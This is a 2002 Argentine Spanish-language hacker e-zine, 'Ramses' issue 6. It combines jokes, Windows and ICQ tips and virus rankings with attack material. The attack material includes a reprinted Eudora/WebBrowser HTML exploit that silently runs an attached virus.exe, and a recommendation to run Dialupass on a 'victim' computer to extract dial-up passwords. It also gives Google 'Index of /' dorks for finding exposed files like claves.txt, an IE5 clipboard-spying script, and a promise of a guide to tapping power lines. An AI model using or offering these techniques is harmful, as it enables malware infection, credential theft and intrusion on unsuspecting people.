~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
~^~^~^~^~^~^~^~^~^\\*\\ RoSarIo, Argentina. Año I edicion Nº VI //*//^~ 
~^~^~^                            __                                 ^~ 
~^~^~^        ____               / /                                 ^~
~^~^~^       / __ \  ____    ___/ /__   ___   ___   ___              ^~
~^~^~^      / /_/ / / __ \  / _   _  \ / __\ / _ \ / __\             ^~
~^~^~^     / _  _/ / _   / / / / / / //__  //  __//__  /             ^~
~^~^~^    /_/ |_| /_/ /_/ /_/ /_/ /_/ \___/ \___/ \___/              ^~
~^~^~^                                             Cyber             ^~ 
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~

                     : : : : N O T A : : : : 
    
     Si queres colaborar, opinar, avisar que toca tu banda, hacer un 
           escrache o organizar una partuza o cualquier cosa 
   ya sabes rampuza@hotmail.com nosotros nos encargamos de publicarlo.
       
Se buscan colaboradores, si queres colaborar mandame tu truco, articulo
              curso o lo que sea a mi mail, en formato .txt

~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®®@m§E§ 
~                                                                    E§
~                           ATENCION:                                E§
~    El contenido de esta revista esta hecho con fines meramentes    E§
~ informativos no pretendemos incitar a la ilegalidad, por tal razon E§
~        no me responzabilizo por el uso erroneo de la data.         E§
~                                                                    E§
~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®®@m§E§ 
~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®~®@m§E§¤©¥þE®®@m§E§ 


              WEB SITE: http://ramses.05c.net

      DIRTRIBUIDORES Y MIRRORS: http://www.zine-store.com.ar
                                http://webcindario.com/ramses
                                
              MAILS: rampuza@hotmail.com
                     el_revelde22@hotmail.com

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 

I N D I C E                   T E M A                       A U T O R
^^^^^^^^^^^                   ^^^^^^^                      F U E N T E
                                                           ^^^^^^^^^^^ 
01]Editorial ---------> Noticias de ramses -------------> eL_ReVelde
02]Humor -------------> Choborras ----------------------> La Red
03]Trucos ------------> Seleccion de trucos ------------> La Red
04]Reporte -----------> Dominio .com.ar gratis ---------> eL_ReVelde
05]Webmasters --------> Styles & scripts ---------------> eL_ReVelde
06]Electronica -------> Emulador de alarmas p/autos ----> eL_ReVelde
07]Reporte II --------> Vulnerabilidad en WebBrowser ---> PC world
08]Bonus -------------> dialupass ---------> http://nirsoft.tripod.com/ 
09]Top dowloads ------> Los + bajados ------------------> softonic.com
10]Viruses -----------> Ranking + alertas --------------> Virus attack!
11]Freeware ----------> El recomendado -----------------> eL_ReVelde
12]Informe -----------> Trucos en buscadores -----------> eL_ReVelde
13]Reporte III -------> Script para IE 5 ---------------> eL_ReVelde

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 


01]====================================================================
                           E D I T O R I A L
                             ´´°¤ø,¸,ø¤°`` 

Buenas, este es el Nº 6 de ramses y viene con novedades, les cuento 
que a partir de ahora la revista no va a salir una vez por mes, sino 
que saldrá en lapsos de 20 dias aproximadamente.
Les cuento que para la proxima edicion prepare una completa guia de
hack hogareño, el que incluye como violar el nuevo cableado de la
empresa de energia casi sin riegoa que nos cachen.
Bueno por ahora na mas nos vemos en la proxima.


02]====================================================================
                               H U M O R
                             ´´°¤ø,¸,ø¤°`` 


Va un borracho por la calle y cruza una vieja y le dice:
-Chau vieja fea.
la vieja responde: -chau borracho inmundo.
y el borracho le dice: -si pero a mi mañana se me va.


Hay un borracho frente a la playa y grita desesperadamente:
¡Una ballena, una ballena!
Y todas las personas salen de la playa, luego viene el salvavidas, 
y pregunta:
¿Dónde, dónde está la ballena?
Y el borracho le dice:
No, es que se me cayeron dos botellas de vino al mar, ¡Y una va llena


Un niño le pregunta a su padre muy interesado.
Papá, ¿Cómo se sabe que una persona está borracha? 
Pues fácil hijo, ¿Ves esos dos hombres que vienen por ahí? ¡Si yo 
estuviera borracho vería cuatro!
Papá, ¡Si solo viene uno!


Esto es un borracho que está en la calle y le vienen unas terribles
ganas de ir a cagar. El hombre se pone a hacer su necesidad en medio 
de una plaza, cuando de repente llega un policia y le dice: 
- Escuche señor, esto que hace no lo puede hacer aquí 
Y contesta el borracho: 
- Es que no me podía aguantar, usted me entiende, ¿no? 
- Sí, sí, pero me veo obligado a tomar parte en el asunto
- Pues espérese un momento que termine y se la lleva entera.


03]====================================================================
                              T R U C O S
                             ´´°¤ø,¸,ø¤°``

Sacar la pantalla de bienvenida del ICQ
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
Si te tiene podrido la pantalla de bienvenida del ICQ, la podes sacar 
a la mierda, segui la ruta [ICQ/ Preferences/ Miscellaneous/ y des-
marcando el checkbox 
[Show ICQ announcements].

Backup de ICQ
^^^^^^^^^^^^^ 
Deben copiar los siguientes archivos: xxxx.idx, xxxx.dat, xxxx.msg y 
smxxxx.dat (siendo xxxx su número de UIN). Luego, instalen o reinstalen 
ICQ con su número anterior y copien estos archivos. Si instalan la mis-
ma versión, no tienen que hacer nada más. Pero si usan una versión 
posterior, ejecuten la utilidad DBConverter. 

Texto en la barra
^^^^^^^^^^^^^^^^^ 
Si queremos que aparezca cualquier mensaje en la barra, junto al reloj, 
vayamos a los registros de Windows. Como siempre, ejecutemos regedit 
([Inicio/Ejecutar/regedit]).
Localizamos [HKEY_CURRENT_USER/Control Panel/International]. En el 
frame derecho, hacemos clic con el botón derecho y elegimos [Nuevo/
Valor de la cadena]. Dentro del cuadro ingresamos s1159 y <ENTER>.
Después, sobre la cadena creada, hacemos doble clic y ponemos 
¿Qué hora es?. Luego, como en el procedimiento anterior, creamos 
otra cadena ([Nuevo/Valor de la cadena]), pero con el nombre s2359. 
Luego, presionamos <ENTER> y cambiamos /Información del valor/ por 
¿Qué hora es? (la misma cadena de caracteres que en s1159). Por 
último hay que crear la tercera cadena, con el nombre sTimeFormat y 
su información del valor con HH:mm:ss tt. 
Aceptemos y luego cerramos regedit. A continuación, reiniciamos la 
máquina y ahora Windows estará personalizado. Sin embargo, hay un de-
talle: para algunos eventos en los que se utilice la fecha, se in-
cluirá el mensaje también dentro del formato de la hora. Por ejemplo, 
se obtendrá un resultado del tipo 17:20:00 ¿Qué hora es?. Además, 
nuestra cadena de caracteres reemplazará a.m. y p.m. en la barra de 
herramientas.

Maxima velocidad con ADSL 
^^^^^^^^^^^^^^^^^^^^^^^^^
Si queremos acelerar nuestra conexión ADSL, Speed Guide nos dejará 
mucho más contentos.Patches ofrece ZIPs genéricos que modifican los 
registros, cada uno para una versión de Windows. Para instalar el ar-
chivo para Windows 98 y Me, vamos a www.speedguide.net/Cable_modems/
cable_patches.shtml y guardamos guide_tweak_98.zip. Luego, habrá que 
hacer clic con el botón derecho sobre sguide_tweak_98.inf, seleccionar 
[Instalar], y reiniciar; el trabajo ya estará terminado. Sin embargo, 
si nuestra conexión está peor, podemos restaurar los registros.
Sólo tendremos que ir a [Inicio/Ejecutar], escribir scanregw/restore 
y elegir la última versión en la que todo funcionaba correctamente  


04]====================================================================
                           R E P O R T E
                           ´´°¤ø,¸,ø¤°``
                           
Dominio tu-pagina.com.ar gratis en www.netfirms.com
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Es algo similar a lo que ofrecia en su momento freeservers.com, pero
ofrece mejor servicio.
veamos que nos ofrece el servicio gratuito de netfirms.com:

FREE WEB HOSTING
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
¤ FREE 25 MB Webspace  (25 megas de espacio gratarola) 
¤ FREE Domain Hosting  (dominio gratarola)
¤ FREE CGI-BIN Support (Soporta cgi-bin)
¤ FREE 24/7 FTP Access (acceso FTP, esto freeservers no lo permite)
¤ FREE Online Support  (soporte en linea gratis)
¤ FREE Promotion       (promocion gratis, eso si, si ponen su mail real
                        preparense para recibir spam)
¤ INSTANT activation   (activacion instantanea, para el dominio 
                        .com.ar hay que esperar unos dias)


Tambien ofrece mail, etc...

Muy recomendable tambien podes optar por planes pagos que por $ 5 
x mes, que son muy buenos.   
                 
              
05]====================================================================
                        W E B S M A S T E R S
                            ´´°¤ø,¸,ø¤°``

Syle para que el cursor se convierta en una mira:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
<style type="text/css">
<!--
body {  cursor: crosshair}
-->
</style>

Enviar un mail con el "asunto" o "subjet" completo:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
mailto:tu-mail@servidor.com?
subject=el asunto que quieras

Texto que persigue el puntero del mouse:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
este ya se encuentra en formato .html, adjunto en la carpeta webmasters.




06]====================================================================
                       E L E C T R O N I C A
                           ´´°¤ø,¸,ø¤°``

En esta seccion vamos a poner una tremenda boludes que muchas veces
espanta a los ratones que andan robando las cosas que quedan en nuestro
auto.
Como las alarmas reales dejan visible en el tablero de automovil un 
pequeño led titilando para que se den cuenta que este tiene alarma,
lo que nosotros vamos a hacer es emular que poseemos alarmas insertando
un led intermitente en el tablero de nuestro movil.

Hay dos formas: 
               a) Vamos y compramos un led intermitente, le decimos que
es para alimentacion 12v y nos daran tambien la resistencia.
               b) O compramos solo el led y hacemos el circuito para
que titile y sea alimentado por una pila AA de 1,5v.

se adjunta el circuito de la opcion b) en la seccion <electronika>
                                           
  
07]====================================================================
                          R E P O R T E II
                           ´´°¤ø,¸,ø¤°``

Vulnerabilidad:
Ejecución de archivos adjuntos en el componente WebBrowser 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

El componente WebBrowser de Microsoft incluido en Windows es usado por 
varios programas para visualizar los correos electrónicos en HTML. 
Entre estos programas cabe destacar el conocido software Eudora. 
A su vez, este componente es usado, evidentemente, 
en el software Outlook Express 4 y 6 y Outlook 2000).

El fallo en cuestión afecta principalmente a Eudora, ya que permite 
ejecutar archivos ejecutables adjuntos a un mensaje de correo si, 
simplemente, el atacante sabe dónde se almacenan los ficheros adjuntos 
de Eudora. El problema se agrava debido a que la mayoría de usuarios 
establecen como directorio de instalación el proporcionado por defecto 
en la instalación: c:\Archivos de Programa\Qualcomm\Eudora\Attach.

Técnicamente el responsable de esta vulnerabilidad es, de nuevo, 
Windows Media Player, que es ejecutado sin confirmación por WebBrowser 
al visualizar un mensaje, más concretamente el tipo de archivo .WMW. 
Veámoslo con un ejemplo:

<body>
Hola, Eudora.
<xml:namespace prefix="t"/>
<t:video style="display:none;behavior:url(#default#time);"
t:src="file://c:/Archivos de Programa/Qualcomm
/Eudora/Attach/lanza.wmw"/>
</body>

El mensaje es enviado a la víctima con el código superior junto con
los siguientes archivos adjuntos: lanza.wmw (4KB), lanza.html (1KB)
y virus.exe. En menos de 2 segundos la máquina será afectada por el 
fallo descrito, ejecutando el programa virus.exe, y presumiblemente 
causar daños en el equipo afectado o incluso la toma de posesión 
total de la máquina (si se envía junto a un troyano).

Solución:
^^^^^^^^^
Pra solucionar dicha vulnerabilidad hay que deshabilitar 
el uso de WebBrowser en Eudora.
accediendo al menú Tools/Options/Viewing y quitar el soporte para usar 
el visor de Microsoft (Use Microsoft Viewer). También es recomendable 
cambiar la ruta de los archivos adjuntos de Eudora para prevenir 
futuros ataques.
                   
                                        Articulo extraido de PC world.


08]====================================================================
                              B O N U S
                            ´´°¤ø,¸,ø¤°``

* Se adjunta la utilidad de la que se habla en la seccion freeware.
                            

09]====================================================================
                       T O P - D O W N L O A D S
                             ´´°¤ø,¸,ø¤°``

             
             P R O G R A M A S                              DESCARGAS

01)--------> WinSMS 07/06/2002 r1 -------------------------> 13.402
02)--------> Audiogalaxy Satellite Agent 0.609 ------------> 11.648
03)--------> Winzip 8.1 (4331) ----------------------------> 10.741
04)--------> Kazaalite 1.6.1 ------------------------------> 10.396
05)--------> Kazaalite 1.7.1 ------------------------------>  7.068
06)--------> eDonkey2000 35.16.61 ------------------------->  6.063
07)--------> Coding Workshop Ringtone Converter 3.5.7 ----->  5.888
08)--------> MSN Messenger Service 4.6.0082 --------------->  5.647
09)--------> WinMX 3.11 Beta 2 ---------------------------->  5.580
10)--------> Nero Burning Rom 5.5.8.2 --------------------->  5.409


                           Fuente: softonic

10]====================================================================
                            V I R U S E S
                            ´´°¤ø,¸,ø¤°``


  Ránking de virus más reportados 
Desde: 16/05/2002 Hasta: 16/06/2002  
 
01. W32/Klez.H .............. (26.67 %)    
02. W32/Moe ................. (20.00 %)    
03. Worm/Hybris ............. (10.00 %)    
04. W32/Psycho .............. (06.67 %)    
05. W97M/Aleja .............. (06.67 %)    
06. Bleah.b ................. (03.33 %)    
07. MBR/Eek.b ............... (03.33 %)    
08. SubSeven ................ (03.33 %)    
09. VBS/Helper .............. (03.33 %)    
10. Otros ................... (16.67 %)    
 
 
          A L E R T A S:
          ^^^^^^^^^^^^^^
Ultima actualización: 16/06/2002
 
 
   Nombre                    Tipo 
 
W32.Higuy-----------------Gusano de internet
W32/Perrun----------------Troyano
W32/Chier-----------------Gusano de internet
Trojan/Latinus------------Troyano
W32/Frethem.D-------------Gusano de internet
W32/Nople-----------------Gusano (Recursos compartidos)
W32/Shermnar--------------Gusano de internet (Kazaa P2P)
W32/Pet_ticky-------------Gusano de internet
W32/Win64-----------------Gusano de internet, Residente
W32/Enemany.b-------------Gusano de internet
W32/Nahata.E--------------Gusano de internet
{W32, Linux}/Simile.D-----Infector de archivos (Windows, Linux)
Trojan/Omed.b-------------Troyano



                     Fuente: www.virusattack.com.ar

11]====================================================================
                           F R E E W A R E
                            ´´°¤ø,¸,ø¤°``

Dialupass 1.0
^^^^^^^^^^^^^
Fecha de Alta: 14/06/2002
Tamaño: 17 KB
Plataformas: Windows 95 / 98 / ME / NT / 2000 / XP
Home Page: http://nirsoft.tripod.com/ 

Muy similar al password crack y pwltool, al ejecutar esta herramienta
en la maquina victima te muestra todos los accesos dial-up de esa 
computadora y revela los detalles del login, usuario, contraseña y 
dominio.
Impresindible para nosotros, siempre tener a mano en un 3 1/2 cuando
visitamos a alguien.

en la seccion bonus se encuentra adjunto esta utilidad.
     
                  
12]====================================================================
                            I N F O R M E
                            ´´°¤ø,¸,ø¤°``

Muchas veces cuando ingresamos una palabra o varias en una buscador
nos tira un chorizo de cosas y entre ellas nos encontraremos con que
hay cosas que nada que ver con lo que necesitamos.
Lo que pasa que hay que ser mas especifico con el buscador.

¤ Si en el campo del buscador ingresamos la palabra Loco
nos buscara la palabra Loco como esta escrita y no nos buscaria la
palabra loco ni LOCO.
osea escribiendo la palabra en minuscula engloba las 3 formas de es-
critura 

¤ Si lo que quieres es buscar la frase redonditos de ricota, te con-
viene intruducir esta palabra entre comillas, para que la busqueda se
situe y nos muestre el resultado con esas tres palabras juntas.
quedaria entonces: "redonditos de ricota"

¤ Ajusta palabras para que tu busqueda sea satifatoria, si quieres
buscar la hack en paginas argentina pon: hack +argentina
si quieres restar palabras pone: hack +argentina -electronica
(actualmente el buscador google.com.ar trae la opcion de buscar en
sitio en español, en toda la web y en sitio argentinos)

¤ Si la palabra que buscas puede tener distintas terminaciones,
como por ejemplo hack solo escribe la palabra: hack* 
y buscara hacker, hacking, etc.

¤ Si necesitas buscar un listado de paginas argentinas solo escribe:
Domain:ar 
Si quieres ver fotos de la luna escribe: Image:moon o Image:luna
Si quieres ver todas las paginas que tengan un link a virus attack
solo escribe: Link:www.virusattack.com.ar

¤ En google si quieres buscar una foto o un texto escribe:

"Index of /" claves.txt -->nos mostrara todos los sitios en los que se 
                           encuentra dicho archivo

"Index of /" circuito.gif -->nos mostrara todos los sitios en los que 
                             se encuentra dicho archivo

y anda cambiando el nombre del archivo y la extension correspondiente
hasta que encuentres algo importante, te aseguro que hay muchos 
desprevenidos.

Recuerda o ten en cuenta:

.rtf
.pdf
.txt
.doc --> documentos de texto, puede haber algo importante.

.jpg
.bmp
.gif
.jpe --> puedes encontrar planos, circuitos y demas...



13]====================================================================
                         R E P O R T E III
                           ´´°¤ø,¸,ø¤°``

Lectura del portapapeles de Internet explorer 5
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
En la revista ramses Nº 3 ya hemos hablado sobre la noticia de que IE 5
traia una vulnerabilidad, que era la lectura del portapapeles.
Tambien se hablaba de la solucion.
Ahora les mostrare el script que hace posible la letura del portapeles.

Entonces para espiar el contenido del portapapeles les voy a mostrar
la implementación del código JavaScript y cómo invocarlo con el for-
mulario.

Éste es el código:

<SCRIPT LANGUAGE="JavaScript">
function paste() {
alert("Espiá el Portapapeles");
document.form.clipboard.focus();
document.execCommand("paste");
}
</SCRIPT>

Y éste, el formulario:
<FORM ACTION="" NAME="form">
<TEXTAREA NAME=clipboard ROWS=5
COLS=30></TEXTAREA>
<INPUT TYPE=button VALUE=Pegar
NAME=boton onMouseDown="paste()">
</FORM> 

=======================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Si queres colaborar, opinar, avisar que toca tu banda, o organizar una 
partuza, escrache o cualquier cosa,  ya sabes rampuza@hotmail.com noso-
tros nos encargamos de publicarlo.
  
WEB Site: http://ramses.05c.net                      -© by eL_ReVelde- 

mails: rampuza@hotmail.com   &   el_revelde22@hotmail.com
 
Se permite la reproduccion de esta revista respetando el autor y cont.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=======================================================================